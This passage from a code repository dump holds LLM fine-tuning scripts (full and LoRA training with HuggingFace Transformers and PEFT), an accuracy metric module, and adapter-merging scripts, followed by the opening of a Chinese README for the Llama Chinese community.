if l != -100] # for pred, gold_label in zip(preds, labels) # ] # true_labels = [ # [l for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # preds = np.array(true_predictions).reshape(-1) # labels = np.array(true_labels).reshape(-1) return metric.compute(predictions=preds, references=labels) # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, # Data collator will default to DataCollatorWithPadding, so we change it. 
data_collator=transformers.DataCollatorForSeq2Seq( tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True ), compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available()else None, ) # Training if training_args.do_train: checkpoint = None if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint print(training_args.local_rank,'start train') if torch.__version__ >= "2" and sys.platform != "win32": model = torch.compile(model) train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main() File: train/sft/accuracy.py # Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Accuracy metric.""" import datasets from sklearn.metrics import accuracy_score import evaluate _DESCRIPTION = """ Accuracy is the proportion of correct predictions among the total number of cases processed. It can be computed with: Accuracy = (TP + TN) / (TP + TN + FP + FN) Where: TP: True positive TN: True negative FP: False positive FN: False negative """ _KWARGS_DESCRIPTION = """ Args: predictions (`list` of `int`): Predicted labels. references (`list` of `int`): Ground truth labels. normalize (`boolean`): If set to False, returns the number of correctly classified samples. Otherwise, returns the fraction of correctly classified samples. Defaults to True. sample_weight (`list` of `float`): Sample weights Defaults to None. Returns: accuracy (`float` or `int`): Accuracy score. Minimum possible value is 0. Maximum possible value is 1.0, or the number of examples input, if `normalize` is set to `True`.. A higher score means higher accuracy. 
Examples: Example 1-A simple example >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0]) >>> print(results) {'accuracy': 0.5} Example 2-The same as Example 1, except with `normalize` set to `False`. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], normalize=False) >>> print(results) {'accuracy': 3.0} Example 3-The same as Example 1, except with `sample_weight` set. >>> accuracy_metric = evaluate.load("accuracy") >>> results = accuracy_metric.compute(references=[0, 1, 2, 0, 1, 2], predictions=[0, 1, 1, 2, 1, 0], sample_weight=[0.5, 2, 0.7, 0.5, 9, 0.4]) >>> print(results) {'accuracy': 0.8778625954198473} """ _CITATION = """ @article{scikit-learn, title={Scikit-learn: Machine Learning in {P}ython}, author={Pedregosa, F. and Varoquaux, G. and Gramfort, A. and Michel, V. and Thirion, B. and Grisel, O. and Blondel, M. and Prettenhofer, P. and Weiss, R. and Dubourg, V. and Vanderplas, J. and Passos, A. and Cournapeau, D. and Brucher, M. and Perrot, M. and Duchesnay, E.}, journal={Journal of Machine Learning Research}, volume={12}, pages={2825--2830}, year={2011} } """ @evaluate.utils.file_utils.add_start_docstrings(_DESCRIPTION, _KWARGS_DESCRIPTION) class Accuracy(evaluate.Metric): def _info(self): return evaluate.MetricInfo( description=_DESCRIPTION, citation=_CITATION, inputs_description=_KWARGS_DESCRIPTION, features=datasets.Features( { "predictions": datasets.Sequence(datasets.Value("int32")), "references": datasets.Sequence(datasets.Value("int32")), } if self.config_name == "multilabel" else { "predictions": datasets.Value("int32"), "references": datasets.Value("int32"), } ), reference_urls=["https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html"], ) def _compute(self, predictions, references, normalize=True, sample_weight=None): return { "accuracy": float( accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight) ) } File: train/sft/finetune_clm_lora.py #!/usr/bin/env python # coding=utf-8 # Copyright 2020 The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset. Here is the full list of checkpoints on the hub that can be fine-tuned by this script: https://huggingface.co/models?filter=text-generation """ # You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments. 
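# Note: unlike the full-parameter fine-tuning script (train/sft/finetune_clm.py), this variant
# wraps the base model with a PEFT LoRA adapter (see LoraConfig / get_peft_model below) and can
# optionally load the base weights in 8-bit or 4-bit via --load_in_bits before training.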
import logging import math import os import sys import random from dataclasses import dataclass, field from itertools import chain import deepspeed from typing import Optional,List,Union import datasets import evaluate import torch from datasets import load_dataset from peft import ( # noqa: E402 LoraConfig, PeftModel, get_peft_model, get_peft_model_state_dict, prepare_model_for_int8_training, prepare_model_for_kbit_training, set_peft_model_state_dict, ) import transformers from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR from transformers import ( CONFIG_MAPPING, MODEL_FOR_CAUSAL_LM_MAPPING, AutoConfig, AutoModelForCausalLM, AutoTokenizer, TrainerCallback, TrainerState, TrainerControl, HfArgumentParser, Trainer, TrainingArguments, default_data_collator, BitsAndBytesConfig, is_torch_tpu_available, set_seed, ) from transformers.testing_utils import CaptureLogger from transformers.trainer_utils import get_last_checkpoint from transformers.utils import check_min_version, send_example_telemetry from transformers.utils.versions import require_version import pdb # Will error if the minimal version of Transformers is not installed. Remove at your own risks. # check_min_version("4.27.0.dev0") require_version("datasets>=1.8.0", "To fix: pip install -r examples/pytorch/language-modeling/requirements.txt") logger = logging.getLogger(__name__) MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys()) MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES) @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": ( "The model checkpoint for weights initialization.Don't set if you want to train a model from scratch." ) }, ) model_type: Optional[str] = field( default=None, metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)}, ) config_overrides: Optional[str] = field( default=None, metadata={ "help": ( "Override some existing default config settings when a model is trained from scratch. Example: " "n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index" ) }, ) config_name: Optional[str] = field( default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"} ) tokenizer_name: Optional[str] = field( default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"} ) cache_dir: Optional[str] = field( default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"}, ) lora_r: Optional[int] = field(default=16) lora_alpha: Optional[int] = field(default=32) target_modules: Optional[str] = field( default='q_proj,v_proj,k_proj,o_proj,gate_proj,down_proj,up_proj', metadata={ "help": "List of module names or regex expression of the module names to replace with Lora." 
"For example, ['q', 'v'] or '.*decoder.*(SelfAttention|EncDecAttention).*(q|v)$' " }, ) use_fast_tokenizer: bool = field( default=True, metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."}, ) load_in_bits: Optional[int] = field(default=8) model_revision: str = field( default="main", metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."}, ) use_auth_token: bool = field( default=False, metadata={ "help": ( "Will use the token generated when running `huggingface-cli login` (necessary to use this script " "with private models)." ) }, ) torch_dtype: Optional[str] = field( default=None, metadata={ "help": ( "Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the " "dtype will be automatically derived from the model's weights." ), "choices": ["auto", "bfloat16", "float16", "float32"], }, ) def __post_init__(self): if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None): raise ValueError( "--config_overrides can't be used in combination with --config_name or --model_name_or_path" ) if type(self.target_modules)==str: self.target_modules = self.target_modules.split(',') @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ train_on_inputs: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) dataset_name: Optional[str] = field( default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."} ) dataset_config_name: Optional[str] = field( default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."} ) train_files: Optional[List[str]] = field(default=None, metadata={"help": "The input training data file (a text file)."}) validation_files: Optional[List[str]] = field( default=None, metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."}, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of training examples to this " "value if set." ) }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": ( "For debugging purposes or quicker training, truncate the number of evaluation examples to this " "value if set." ) }, ) streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"}) block_size: Optional[int] = field( default=None, metadata={ "help": ( "Optional input sequence length after tokenization. " "The training dataset will be truncated in block of this size for training. " "Default to the model max input length for single sentence inputs (take into account special tokens)." 
) }, ) overwrite_cache: bool = field( default=False, metadata={"help": "Overwrite the cached training and evaluation sets"} ) validation_split_percentage: Optional[int] = field( default=5, metadata={ "help": "The percentage of the train set used as validation set in case there's no validation split" }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={"help": "The number of processes to use for the preprocessing."}, ) keep_linebreaks: bool = field( default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."} ) def __post_init__(self): if self.streaming: require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`") if self.dataset_name is None and self.train_files is None and self.validation_files is None: raise ValueError("Need either a dataset name or a training/validation file.") else: if self.train_files is not None: extension = self.train_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`train_file` should be a csv, a json or a txt file." if self.validation_files is not None: extension = self.validation_files[0].split(".")[-1] assert extension in ["csv", "json", "txt"], "`validation_file` should be a csv, a json or a txt file." class SavePeftModelCallback(TrainerCallback): def on_save( self, args: TrainingArguments, state: TrainerState, control: TrainerControl, **kwargs, ): if state.is_world_process_zero: print('+++++++++++++++++save call back++++++++++++++++') checkpoint_folder = os.path.join( args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}" ) kwargs["model"].save_pretrained(checkpoint_folder) pytorch_model_path = os.path.join(checkpoint_folder, "pytorch_model.bin") if os.path.exists(pytorch_model_path): os.remove(pytorch_model_path) return control def main(): # See all possible arguments in src/transformers/training_args.py # or by passing the --help flag to this script. # We now keep distinct sets of args, for a cleaner separation of concerns. parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments)) # pdb.set_trace() if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1])) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The # information sent is the one passed as arguments along with your Python/PyTorch versions. send_example_telemetry("run_clm", model_args, data_args) # Setup logging logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", handlers=[logging.StreamHandler(sys.stdout)], ) if training_args.should_log: # The default of training_args.log_level is passive, so we set log level at info here to have that default. 
transformers.utils.logging.set_verbosity_info() log_level = training_args.get_process_log_level() logger.setLevel(log_level) datasets.utils.logging.set_verbosity(log_level) transformers.utils.logging.set_verbosity(log_level) transformers.utils.logging.enable_default_handler() transformers.utils.logging.enable_explicit_format() # Log on each process the small summary: logger.warning( f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}" + f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}" ) logger.info(f"Training/evaluation parameters {training_args}") # Detecting last checkpoint. last_checkpoint = None if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir: last_checkpoint = get_last_checkpoint(training_args.output_dir) if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0: raise ValueError( f"Output directory ({training_args.output_dir}) already exists and is not empty. " "Use --overwrite_output_dir to overcome." ) elif last_checkpoint is not None and training_args.resume_from_checkpoint is None: logger.info( f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change " "the `--output_dir` or add `--overwrite_output_dir` to train from scratch." ) # Set seed before initializing model. set_seed(training_args.seed) # Get the datasets: you can either provide your own CSV/JSON/TXT training and evaluation files (see below) # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/ # (the dataset will be downloaded automatically from the datasets Hub). # # For CSV/JSON files, this script will use the column called 'text' or the first column if no column called # 'text' is found. You can easily tweak this behavior (see below). # # In distributed training, the load_dataset function guarantee that only one local process can concurrently # download the dataset. if True: data_files = {} dataset_args = {} if data_args.train_files is not None: data_files["train"] = data_args.train_files if data_args.validation_files is not None: data_files["validation"] = data_args.validation_files extension = ( data_args.train_files[0].split(".")[-1] if data_args.train_files is not None else data_args.validation_files.split(".")[-1] ) if extension == "txt": extension = "text" dataset_args["keep_linebreaks"] = data_args.keep_linebreaks raw_datasets = load_dataset( extension, data_files=data_files, cache_dir=os.path.join(training_args.output_dir,'dataset_cache'), use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # If no validation data is there, validation_split_percentage will be used to divide the dataset. if "validation" not in raw_datasets.keys(): raw_datasets["validation"] = load_dataset( extension, data_files=data_files, split=f"train[:{data_args.validation_split_percentage}%]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) raw_datasets["train"] = load_dataset( extension, data_files=data_files, split=f"train[{data_args.validation_split_percentage}%:]", cache_dir=model_args.cache_dir, use_auth_token=True if model_args.use_auth_token else None, **dataset_args, ) # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at # https://huggingface.co/docs/datasets/loading_datasets.html. 
# Load pretrained model and tokenizer # # Distributed training: # The .from_pretrained methods guarantee that only one local process can concurrently # download model & vocab. config_kwargs = { "cache_dir": model_args.cache_dir, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, } if model_args.config_name: config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs) elif model_args.model_name_or_path: config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs) else: config = CONFIG_MAPPING[model_args.model_type]() logger.warning("You are instantiating a new config instance from scratch.") if model_args.config_overrides is not None: logger.info(f"Overriding config: {model_args.config_overrides}") config.update_from_string(model_args.config_overrides) logger.info(f"New config: {config}") tokenizer_kwargs = { "cache_dir": model_args.cache_dir, "use_fast": model_args.use_fast_tokenizer, "revision": model_args.model_revision, "use_auth_token": True if model_args.use_auth_token else None, "padding_side":'left' } if model_args.tokenizer_name: tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs) elif model_args.model_name_or_path: tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **tokenizer_kwargs) else: raise ValueError( "You are instantiating a new tokenizer from scratch. This is not supported by this script." "You can do it from another script, save it, and load it from here, using --tokenizer_name." ) tokenizer.pad_token = tokenizer.eos_token lora_config = LoraConfig( r=model_args.lora_r, lora_alpha=model_args.lora_alpha, # target_modules=["query_key_value"], # target_modules = ['q_proj', 'k_proj', 'v_proj', 'o_proj'], target_modules = model_args.target_modules, fan_in_fan_out = False, lora_dropout=0.05, inference_mode=False, bias="none", task_type="CAUSAL_LM", ) print(lora_config) bnb_config = BitsAndBytesConfig( load_in_4bit=True, bnb_4bit_use_double_quant=True, bnb_4bit_quant_type="nf4", bnb_4bit_compute_dtype=torch.bfloat16 ) if model_args.model_name_or_path: torch_dtype = ( model_args.torch_dtype if model_args.torch_dtype in ["auto", None] else getattr(torch, model_args.torch_dtype) ) print(torch_dtype) torch_dtype = torch.float16 model = AutoModelForCausalLM.from_pretrained( model_args.model_name_or_path, from_tf=bool(".ckpt" in model_args.model_name_or_path), config=config, cache_dir=model_args.cache_dir, revision=model_args.model_revision, use_auth_token=True if model_args.use_auth_token else None, torch_dtype=torch_dtype, load_in_8bit=True if model_args.load_in_bits==8 else False, trust_remote_code=True, use_flash_attention_2=True, quantization_config=bnb_config if model_args.load_in_bits==4 else None, # device_map = 'auto' device_map={"": int(os.environ.get("LOCAL_RANK") or 0)} ) # model = prepare_model_for_int8_training(model, output_embedding_layer_name="embed_out", layer_norm_names=[]) else: model = AutoModelForCausalLM.from_config(config) n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values()) logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params") # We resize the embeddings only when necessary to avoid index errors. If you are creating a model from scratch # on a small vocab and want a smaller embedding size, remove this test. 
embedding_size = model.get_input_embeddings().weight.shape[0] if len(tokenizer) > embedding_size: model.resize_token_embeddings(len(tokenizer)) if model_args.load_in_bits==8: model = prepare_model_for_int8_training(model) elif model_args.load_in_bits==4: model = prepare_model_for_kbit_training(model) # Preprocessing the datasets. # First we tokenize all the texts. if training_args.do_train: column_names = list(raw_datasets["train"].features) else: column_names = list(raw_datasets["validation"].features) train_on_inputs = True if len(column_names)==1: text_column_name = "text" if "text" in column_names else column_names[0] elif len(column_names)==2: input_column_name = 'input' if 'input' in column_names else column_names[0] target_column_name = 'target' if 'target' in column_names else column_names[0] train_on_inputs=False else: raise ValueError('输入文件列数不对') print('train_on_inputs',train_on_inputs) # since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base") def tokenize_function(examples): with CaptureLogger(tok_logger) as cl: output = tokenizer([ item for item in examples[text_column_name]],truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) output['labels'] = output['input_ids'].copy() return output def tokenize(prompt): result = tokenizer(prompt,truncation=True,max_length=data_args.block_size,padding=False,return_tensors=None) result["labels"] = result["input_ids"].copy() return result def generate_and_tokenize_prompt(data_point): input_text = data_point[input_column_name] target_text = data_point[target_column_name] full_prompt = input_text+target_text tokenized_full_prompt = tokenize(full_prompt) if not train_on_inputs: user_prompt = input_text tokenized_user_prompt = tokenize(user_prompt) user_prompt_len = len(tokenized_user_prompt["input_ids"]) tokenized_full_prompt["labels"] = [ -100 ] * user_prompt_len + tokenized_full_prompt["labels"][ user_prompt_len: ] return tokenized_full_prompt with training_args.main_process_first(desc="dataset map tokenization"): if not data_args.streaming: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, num_proc=data_args.preprocessing_num_workers, remove_columns=column_names, load_from_cache_file=not data_args.overwrite_cache, desc="Running tokenizer on dataset", ) else: tokenized_datasets = raw_datasets.map( tokenize_function if train_on_inputs==True else generate_and_tokenize_prompt, batched=True if train_on_inputs==True else False, remove_columns=column_names, ) if data_args.block_size is None: block_size = tokenizer.model_max_length if block_size > 2048: block_size = 2048 else: block_size = min(data_args.block_size, tokenizer.model_max_length) if training_args.do_train: if "train" not in tokenized_datasets: raise ValueError("--do_train requires a train dataset") train_dataset = tokenized_datasets["train"] if data_args.max_train_samples is not None: max_train_samples = min(len(train_dataset), data_args.max_train_samples) train_dataset = train_dataset.select(range(max_train_samples)) for index in random.sample(range(len(train_dataset)), 3): logger.info(f"Sample {index} of the training set: {train_dataset[index]}.") train_dataset = train_dataset.shuffle(seed=training_args.seed) if training_args.do_eval: if "validation" not in tokenized_datasets: raise 
ValueError("--do_eval requires a validation dataset") eval_dataset = tokenized_datasets["validation"] if data_args.max_eval_samples is not None: max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples) eval_dataset = eval_dataset.select(range(max_eval_samples)) def preprocess_logits_for_metrics(logits, labels): if isinstance(logits, tuple): # Depending on the model and config, logits may contain extra tensors, # like past_key_values, but logits always come first logits = logits[0] return logits.argmax(dim=-1) metric = evaluate.load("accuracy.py") def compute_metrics(eval_preds): preds, labels = eval_preds # preds have the same shape as the labels, after the argmax(-1) has been calculated # by preprocess_logits_for_metrics but we need to shift the labels labels = labels[:, 1:].reshape(-1) # .reshape(-1) preds = preds[:, :-1].reshape(-1) # .reshape(-1) # print(labels.shape) # true_predictions = [ # [p for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # true_labels = [ # [l for (p, l) in zip(pred, gold_label) if l != -100] # for pred, gold_label in zip(preds, labels) # ] # preds = np.array(true_predictions).reshape(-1) # labels = np.array(true_labels).reshape(-1) return metric.compute(predictions=preds, references=labels) # layer_norm_names=[] model = get_peft_model(model, lora_config) model.print_trainable_parameters() # Initialize our Trainer trainer = Trainer( model=model, args=training_args, train_dataset=train_dataset if training_args.do_train else None, eval_dataset=eval_dataset if training_args.do_eval else None, tokenizer=tokenizer, # Data collator will default to DataCollatorWithPadding, so we change it. data_collator=transformers.DataCollatorForSeq2Seq( tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True ), compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None, preprocess_logits_for_metrics=preprocess_logits_for_metrics if training_args.do_eval and not is_torch_tpu_available()else None, callbacks=([SavePeftModelCallback] if isinstance(model, PeftModel) else None), ) # Training if training_args.do_train: checkpoint = None '''if training_args.resume_from_checkpoint is not None: resume_from_checkpoint = training_args.resume_from_checkpoint checkpoint_name = os.path.join(resume_from_checkpoint, "pytorch_model.bin") if not os.path.exists(checkpoint_name): checkpoint_name = os.path.join( resume_from_checkpoint, "adapter_model.bin" ) # only LoRA model - LoRA config above has to fit resume_from_checkpoint = ( False # So the trainer won't try loading its state ) # The two files above have a different name depending on how they were saved, but are actually the same. 
if os.path.exists(checkpoint_name): print(f"Restarting from {checkpoint_name}") adapters_weights = torch.load(checkpoint_name) set_peft_model_state_dict(model, adapters_weights) else: print(f"Checkpoint {checkpoint_name} not found") # checkpoint = Fa''' if training_args.resume_from_checkpoint is not None: checkpoint = training_args.resume_from_checkpoint elif last_checkpoint is not None: checkpoint = last_checkpoint if torch.__version__ >= "2" and sys.platform != "win32": model = torch.compile(model) train_result = trainer.train(resume_from_checkpoint=checkpoint) trainer.save_model() # Saves the tokenizer too for easy upload metrics = train_result.metrics max_train_samples = ( data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset) ) metrics["train_samples"] = min(max_train_samples, len(train_dataset)) trainer.log_metrics("train", metrics) trainer.save_metrics("train", metrics) trainer.save_state() # Evaluation if training_args.do_eval: logger.info("*** Evaluate ***") metrics = trainer.evaluate() max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset) metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset)) try: perplexity = math.exp(metrics["eval_loss"]) except OverflowError: perplexity = float("inf") metrics["perplexity"] = perplexity trainer.log_metrics("eval", metrics) trainer.save_metrics("eval", metrics) def _mp_fn(index): # For xla_spawn (TPUs) main() if __name__ == "__main__": main() File: train/merge_peft_model/merge_muilt_peft_adapter.py from dataclasses import dataclass, field from typing import Optional,List import peft import torch from peft import PeftConfig, PeftModel,PeftModelForSequenceClassification from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer, HfArgumentParser,AutoModelForSequenceClassification from peft.utils import _get_submodules @dataclass class ScriptArguments: """ The name of the Casual LM model we wish to fine with PPO """ adapter_model_name: Optional[List[str]] = field(default=None, metadata={"help": "the model name"}) output_name: Optional[str] = field(default=None, metadata={"help": "the model name"}) parser = HfArgumentParser(ScriptArguments) script_args = parser.parse_args_into_dataclasses()[0] base_model = None for one_lora_path in script_args.adapter_model_name: if base_model==None: peft_config = PeftConfig.from_pretrained(one_lora_path) tokenizer = AutoTokenizer.from_pretrained(peft_config.base_model_name_or_path) tokenizer.save_pretrained(f"{script_args.output_name}") base_model = AutoModelForCausalLM.from_pretrained(peft_config.base_model_name_or_path, return_dict=True, torch_dtype=torch.bfloat16) peft_config = PeftConfig.from_pretrained(one_lora_path) base_model = PeftModel.from_pretrained(base_model, one_lora_path,device_map={"": 0}) # model = AutoModelForCausalLM.from_pretrained(peft_config.base_model_name_or_path, return_dict=True, device_map='auto',load_in_8bit=True) # Load the Lora model base_model = base_model.merge_and_unload() base_model.eval() # key_list = [key for key, _ in model.base_model.model.named_modules() if "lora" not in key] # for key in key_list: # print(key) # parent, target, target_name = _get_submodules(model.base_model,key) # if isinstance(target, peft.tuners.lora.Linear): # print('peft.tuners.lora.Linear') # bias = target.bias is not None # new_module = torch.nn.Linear(target.in_features, target.out_features, bias=bias) # model.base_model._replace_module(parent, target_name, new_module, target) # 
model = model.base_model.model base_model.save_pretrained(f"{script_args.output_name}") # model.push_to_hub(f"{script_args.output_name}", use_temp_dir=False) File: train/merge_peft_model/merge_peft_adapter.py from dataclasses import dataclass, field from typing import Optional import peft import torch from peft import PeftConfig, PeftModel,PeftModelForSequenceClassification from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer, HfArgumentParser,AutoModelForSequenceClassification from peft.utils import _get_submodules @dataclass class ScriptArguments: """ The name of the Casual LM model we wish to fine with PPO """ adapter_model_name: Optional[str] = field(default=None, metadata={"help": "the model name"}) load8bit : Optional[bool] = field(default=None, metadata={"help": "the model type"}) output_name: Optional[str] = field(default=None, metadata={"help": "the model name"}) tokenizer_fast:Optional[bool] = field(default=None, metadata={"help": "the model type"}) parser = HfArgumentParser(ScriptArguments) script_args = parser.parse_args_into_dataclasses()[0] peft_config = PeftConfig.from_pretrained(script_args.adapter_model_name) model = AutoModelForCausalLM.from_pretrained(peft_config.base_model_name_or_path, return_dict=True, torch_dtype=torch.float16,device_map='auto',trust_remote_code=True) model = PeftModel.from_pretrained(model, script_args.adapter_model_name,device_map='auto') tokenizer = AutoTokenizer.from_pretrained(peft_config.base_model_name_or_path,use_fast=script_args.tokenizer_fast) config = AutoConfig.from_pretrained(peft_config.base_model_name_or_path) architecture = config.architectures[0] print(architecture) # Load the Lora model model = model.merge_and_unload() model.eval() model.save_pretrained(f"{script_args.output_name}") tokenizer.save_pretrained(f"{script_args.output_name}") if script_args.load8bit: model = AutoModelForCausalLM.from_pretrained(script_args.output_name, torch_dtype=torch.float16,load_in_8bit=script_args.load8bit,device_map='auto',trust_remote_code=True) model.save_pretrained(f"{script_args.output_name}",max_shard_size='5GB')
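
# Example invocation (the paths/names below are illustrative):
#   python merge_peft_adapter.py \
#       --adapter_model_name FlagAlpha/Llama2-Chinese-7b-Chat-LoRA \
#       --output_name ./merged/Llama2-Chinese-7b-Chat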
<p align="left"> <a href="README_EN.md">English</a> | 中文 </p> <h1 align="center"> Llama中文社区 </h1> <p align="center" width="100%"> <img src="assets/llama.jpg" alt="Llama" style="width: 20%; display: block; margin: auto;"></a> </p> <p align="center"> <font face="黑体" color=orange size="6"> Llama3体验和微调已开放,最好的中文Llama大模型 </font> </p> <p align="center"> 🤗 <a href="https://huggingface.co/FlagAlpha" target="_blank">Hugging Face</a> • 🤖 <a href="https://www.modelscope.cn/organization/FlagAlpha/" target="_blank">ModelScope</a> • ✡️ <a href="https://wisemodel.cn/models/FlagAlpha/Atom-7B-Chat" target="_blank">WiseModel</a> </p> <p align="center"> <a href="https://llama.family">Llama3.1 在线体验(包含Llama2):https://llama.family</a> </p> <p align="center"> <a href="https://huggingface.co/FlagAlpha/Atom-7B-Chat">基于Llama的开源中文预训练大模型Atom</a> </p> </br></br> ## 🗂️ 目录 - [📌 Llama中文社区](#-llama中文社区) * [🔥 社区介绍:Llama中文社区](#-社区介绍llama中文社区) * [📢 最新动态](#-最新动态) * [🤗 模型](#-模型) + [🤗 中文预训练模型Atom-7B](#-中文预训练模型atom) + [🤗 Llama3官方模型](#llama3官方模型) + [🤗 Llama3中文微调模型](#llama3中文微调模型) + [🤗 Llama2官方模型](#llama2官方模型) + [🤗 Llama2中文微调模型](#llama2中文微调模型) * [🌟 社区资源](#社区资源) - [📌 如何使用Llama模型?](#-如何使用llama模型) - [快速上手-使用Anaconda](#快速上手-使用anaconda) - [快速上手-使用Docker](#快速上手-使用docker) - [快速上手-使用llama.cpp](#快速上手-使用llamacpp) - [快速上手-使用gradio](#快速上手-使用gradio) - [快速上手-构建API服务](#快速上手-构建api服务) - [快速上手-使用ollama运行](#快速上手-使用ollama运行) + [🤖 模型预训练](#-模型预训练) + [💡 模型微调](#-模型微调) - [Step1: 环境准备](#step1-环境准备) - [Step2: 